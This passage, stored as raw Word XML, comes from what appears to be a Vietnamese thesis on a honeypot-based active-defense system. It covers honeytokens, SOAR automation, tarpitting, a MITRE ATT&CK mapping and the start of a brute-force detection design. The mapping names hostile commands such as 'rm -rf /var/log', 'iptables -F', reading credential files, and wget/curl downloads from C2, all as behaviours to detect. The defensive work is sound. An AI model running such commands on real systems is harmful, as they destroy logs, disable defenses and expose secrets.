          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014C">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Rất cao (Lật tẩy IP thật khi hacker mở Honeytoken trên máy cá nhân).</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014D">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4E">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2.4 Chiến lược Đánh lừa Chủ động (Active Deception) và Kỹ thuật Honeytoken /Canary Tokens</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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Kỹ thuật Honeytoken (hoặc Canary Token) là một trong những vũ khí phòng thủ chủ động tinh vi nhất của an ninh mạng hiện đại. Một Honeytoken là một mẩu dữ liệu giả mạo (Fake Credential, API Key, Database Dump, File tài liệu nội bộ) được cố tình gài cắm ở những vị trí mà chỉ có kẻ xâm nhập trái phép mới tìm thấy và tò mò tiếp cận.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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Cơ chế Khử ẩn danh Kẻ tấn công (Adversarial De-anonymization) hoạt động dựa trên tâm lý học của tin tặc:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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1 - Gài bẫy (Luring): Bên trong hệ thống tệp tin của Cowrie, ta tạo ra các tệp tin có vẻ vô cùng giá trị, ví dụ: '/root/.aws/credentials', '/root/.bash_history' hoặc '/var/backups/db_dump_passwords.txt'.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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2 - Đánh cắp (Exfiltration): Khi kẻ tấn công xâm nhập thành công vào Honeypot qua SSH, đối phương sẽ sử dụng lệnh 'cat' hoặc dùng SFTP để tải các tệp tin này về máy của chúng.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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3 - Thử nghiệm (Weaponization &amp; Trigger): Kẻ tấn công muốn sử dụng tài khoản AWS hoặc mật khẩu vừa đánh cắp. Để làm điều đó, chúng sẽ mở tài liệu trên trình duyệt hoặc chạy lệnh curl xác thực tài khoản. Tuy nhiên, các thông tin trong file bẫy đều được nhúng sẵn một mã định danh theo dõi (Canary Webhook Beacon).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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4 - Lật tẩy Danh tính Thật (De-cloaking): Khi kẻ tấn công kích hoạt đường link trên máy cá nhân của chúng (nơi chúng không bật proxy hoặc đã ngắt kết nối SSH bẫy), gói tin HTTP request sẽ gửi thẳng về Webhook Server của ta. Lúc này, hệ thống sẽ ghi nhận được: Địa chỉ IP thực của hacker, Nhà mạng Internet thực tế (ISP), Thông số User-Agent trình duyệt và Hệ điều hành máy thật của hacker.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000155">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2.5 Khung Tự động hóa và Điều phối Phản ứng Sự cố An ninh (SOAR)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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Khái niệm SOAR (Security Orchestration, Automation, and Response) được hãng nghiên cứu Gartner định hình vào năm 2017, đại diện cho thế hệ công nghệ quản trị an ninh mạng hợp nhất ba năng lực cốt lõi: Quản lý mối đe dọa và lỗ hổng (Threat &amp; Vulnerability Management), Tự động hóa vận hành an ninh (Security Operations Automation) và Điều phối phản ứng sự cố (Incident Response Orchestration).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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một trung tâm điều hành SOC tiêu chuẩn, thời gian trung bình để phản ứng (Mean Time to Respond - MTTR) là thước đo sống còn đối với sự an toàn của doanh nghiệp. Nếu không có SOAR, một chu trình phản ứng bao gồm 4 bước tách rời:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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Phát hiện: Chuyên viên nhìn thấy log cảnh báo.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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Xác minh: Chuyên viên copy IP lên AbuseIPDB, VirusTotal để kiểm tra danh tiếng.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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Quyết định: Đánh giá xem IP có phải là IP quét nguy hại không.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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Khắc phục: SSH vào Firewall để gõ lệnh chặn IP.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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Quy trình thủ công này thường mất 15-20 phút và dễ mắc lỗi do con người. Với SOAR, toàn bộ quy trình này được mã hóa thành các kịch bản thực thi tự động (Automated Playbooks). Khi có sự kiện đạt ngưỡng vi phạm, Playbook sẽ tự động chạy trong vài trăm mili-giây, thực hiện trinh sát, cập nhật bảng luật tường lửa và gửi thông báo tổng hợp tới thiết bị của chuyên viên, giảm MTTR xuống mức gần bằng 0.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015D">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092335"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="170158691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486400" cy="3092335"/>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2.3: Vòng đời xử lý sự cố an ninh chuẩn NIST SP 800-61 r2 tích hợp SOAR</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015F">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2.6 Kỹ thuật Giam lỏng và Tiêu hao Tài nguyên Kẻ tấn công (Connection Tarpitting)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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Tarpit (Hố nhựa đường) là một kỹ thuật mạng phòng thủ chủ động cực kỳ độc đáo và hiệu quả cao trong việc đối phó với các đợt tấn công từ điển tự động. Khác với cơ chế Tường lửa truyền thống (lập tức gửi cờ TCP RST hoặc âm thầm DROP gói tin), Tarpit chọn cách: Chấp nhận kết nối TCP của kẻ tấn công nhưng cố tình phản hồi dữ liệu với tốc độ chậm nhất có thể (chẳng hạn như gửi từng ký tự banner SSH cách nhau 10 đến 15 giây).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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Tác động tiêu hao đối với Kẻ tấn công:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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Các công cụ tấn công brute-force tự động (như Hydra, Medusa, hay các botnet script) hoạt động dựa trên cơ chế đa luồng (Multi-threading). Mỗi luồng sẽ mở một socket TCP tới máy chủ mục tiêu và chờ đợi phản hồi để thử tiếp mật khẩu khác. Khi bị chuyển hướng vào Tarpit:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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Socket của kẻ tấn công bị 'treo' vô thời hạn, không bị ngắt kết nối nhưng cũng không thể gửi tiếp yêu cầu mới.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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Bảng tài nguyên kết nối (File Descriptors / Socket Pool) trên máy tấn công bị lấp đầy và cạn kiệt.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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Cuộc tấn công bị tê liệt hoàn toàn mà kẻ tấn công không hề nhận được bất kỳ tín hiệu lỗi nào để khởi động lại tiến trình.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000166">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2.7 Khung ma trận TTPs chuẩn MITRE ATT&amp;CK trong Phân tích Hành vi Tấn công</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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MITRE ATT&amp;CK (Adversarial Tactics, Techniques, and Common Knowledge) là một cơ sở tri thức toàn cầu chuẩn hóa hành vi của các tác nhân đe dọa dựa trên các quan sát thực tế trong thế giới thực. Việc áp dụng MITRE ATT&amp;CK vào hệ thống Honeypot cho phép chuẩn hóa các sự kiện kỹ thuật thô thành các kỹ thuật tác chiến có ý nghĩa.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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đồ án này, các kỹ thuật cốt lõi sau được nhận diện và ánh xạ tự động:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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T1110 (Brute Force) / T1110.001 (Password Guessing): Hành vi thử liên tiếp nhiều cặp mật khẩu vào tài khoản root/admin.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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T1078 (Valid Accounts): Hành vi đăng nhập thành công vào Honeypot bằng tài khoản mặc định hoặc đoán trúng.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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T1082 (System Information Discovery): Các lệnh thu thập thông tin hệ thống do hacker thực thi ngay sau khi đăng nhập (uname -a, cat /etc/issue, cat /proc/cpuinfo).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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T1059 (Command and Scripting Interpreter): Hành vi thực thi các câu lệnh bash, python, sh bên trong terminal ảo.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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T1105 (Ingress Tool Transfer): Kỹ thuật tải công cụ và mã độc từ máy chủ C2 về máy bẫy thông qua wget hoặc curl.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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T1552.001 (Credentials In Files): Kỹ thuật tìm kiếm và đọc các tệp tin chứa thông tin nhạy cảm (.aws/credentials, id_rsa, db_dump).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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T1562.001 (Impair Defenses - Disable or Modify Tools): Hành vi gõ lệnh nhằm tắt tường lửa hoặc xóa lịch sử log (iptables -F, rm -rf /var/log).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000170">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71">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CHƯƠNG 3: THIẾT KẾ KIẾN TRÚC HỆ THỐNG MINI-SOC ACTIVE DEFENSE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000172">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3.1 Yêu cầu Bài toán và Thiết kế Kiến trúc Phân lớp Tổng thể</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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giải quyết toàn diện bài toán phòng thủ chủ động và vượt qua giới hạn của việc cài đặt ứng dụng đơn thuần, hệ thống được thiết kế theo mô hình Kiến trúc Phân lớp Mini-SOC 5 tầng (5-Layer Architecture). Mỗi tầng đảm nhiệm một vai trò chuyên biệt, độc lập và giao tiếp với nhau thông qua các giao diện lập trình hướng sự kiện (Event-driven Interfaces):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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Tầng 1: Lớp Cảm biến &amp; Đánh lừa Chủ động (Active Deception &amp; Honeypot Layer) - Đóng vai trò là tuyến đầu tiếp nhận tấn công, gồm Cowrie Honeypot tùy biến, hệ thống tệp tin giả lập và các tệp tin mồi nhử Honeytoken có nhúng Webhook Beacon.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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Tầng 2: Lớp Thu thập &amp; Xử lý Luồng Sự kiện (Event Ingestion &amp; Streaming Layer) - Chịu trách nhiệm theo dõi tệp tin nhật ký cowrie.json theo cơ chế stream thời gian thực, chuẩn hóa các trường dữ liệu và bóc tách các tham số IP, tài khoản, câu lệnh và băm tệp tin.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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Tầng 3: Lớp Tương quan &amp; Định danh Tác chiến (Correlation &amp; Threat Intelligence Layer) - 'Bộ não' của hệ thống, chứa thuật toán cửa sổ trượt (Sliding Window Algorithm) để phát hiện Brute-force, tự động ánh xạ sự kiện sang chuẩn MITRE ATT&amp;CK và kích hoạt phân hệ Trinh sát ngược (Reverse Reconnaissance).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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Tầng 4: Lớp Thực thi Phản ứng Tự động (SOAR Enforcement &amp; Active Counter-measure Layer) - Chứa các cơ chế phản đòn hợp pháp: Giam lỏng kết nối vào Tarpit để khóa cứng luồng quét của hacker, tự động cập nhật iptables/nftables để ngăn chặn xâm nhập và xuất bản danh sách đen IOCs.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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Tầng 5: Lớp Giám sát &amp; Điều khiển Tương tác 2 Chiều (Bidirectional Command &amp; Monitoring Layer) - Cung cấp giao diện trực quan thông qua Telegram SOAR Bot với các nút bấm tương tác (Inline Buttons), cho phép chuyên viên SOC can thiệp và kích hoạt các hành động phòng thủ chỉ bằng một chạm.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000179">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591098"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="170158691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486400" cy="3591098"/>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3.1: Sơ đồ kiến trúc tổng thể 5 phân lớp của Hệ sinh thái Active Defense &amp; SOAR</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017B">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3.2 Thiết kế Tầng Thu thập &amp; Streaming Sự kiện thời gian thực (Cowrie Event Collector)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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môi trường tác chiến thực tế, một đợt tấn công brute-force có thể tạo ra hàng trăm lượt đăng nhập mỗi giây. Nếu đọc log theo kiểu tuần tự (Polling/Batch), hệ thống sẽ gặp phải độ trễ lớn và tiêu tốn bộ nhớ I/O. Phân hệ Event Collector được thiết kế theo cơ chế Non-blocking Asynchronous Stream:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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Cơ chế Quản lý Con trỏ Tệp tin (File Pointer Tracking): Module duy trì vị trí con trỏ cuối cùng (offset seek) của file 'cowrie.json'. Khi có dòng log mới được Cowrie ghi xuống đĩa, tiến trình chỉ đọc chính xác phần dung lượng mới sinh ra mà không cần nạp lại toàn bộ file.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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Bộ đệm &amp; Lọc Nhiễu (Filter &amp; Sanitize): Chuyển đổi định dạng chuỗi JSON thô thành đối tượng Python Dictionary có cấu trúc, kiểm tra tính toàn vẹn của gói tin và bỏ qua các bản ghi bị phân mảnh hoặc lỗi cú pháp.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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Cơ chế Tự phục hồi Kết nối (Self-healing &amp; Log Rotation): Khi file log bị hệ điều hành xoay vòng (Logrotate) hoặc khi dịch vụ Cowrie khởi động lại, Event Collector tự động phát hiện sự thay đổi Inode của file và mở lại luồng lắng nghe mà không làm gián đoạn hệ thống.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000180">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3.3 Thiết kế Động cơ Tương quan Sự kiện và Ánh xạ MITRE ATT&amp;CK (Correlation Engine)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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Động cơ Tương quan Sự kiện (Correlation Engine) là linh hồn kỹ thuật của đồ án, chịu trách nhiệm chuyển hóa các dòng log kỹ thuật rời rạc thành các Cảnh báo An ninh Có ý nghĩa (Actionable Security Alerts). Thuật toán hoạt động dựa trên nguyên lý Cửa sổ Thời gian Trượt (Sliding Time Window):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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Gọi W là độ rộng của cửa sổ thời gian (mặc định W = 60 giây) và T là ngưỡng số lần đăng nhập thất bại tối đa cho phép (mặc định T = 5 lần). Với mỗi địa chỉ IP nguồn S_ip gửi sự kiện 'cowrie.login.failed' tại thời điểm t_now, thuật toán thực hiện:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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1: Lấy danh sách lịch sử các mốc thời gian thất bại của S_ip: L = {t_1, t_2, ..., t_k}.</w:t>
      </w:r>
